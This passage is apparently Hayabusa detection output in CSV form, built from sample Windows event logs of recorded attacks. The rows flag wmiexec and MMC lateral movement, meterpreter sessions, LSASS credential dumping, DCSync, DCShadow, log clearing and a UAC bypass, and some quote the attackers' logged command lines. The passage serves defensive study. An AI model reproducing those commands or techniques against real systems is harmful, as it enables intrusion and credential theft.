Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 
05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 
+09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process 
Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 
+09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local 
Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | 
User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 
365ABB72-D1AB-5CC8-0000-0010DB1E4400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 
+09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx 2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx 2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx 2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 
0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx 2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx 2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC 
Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx 2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: 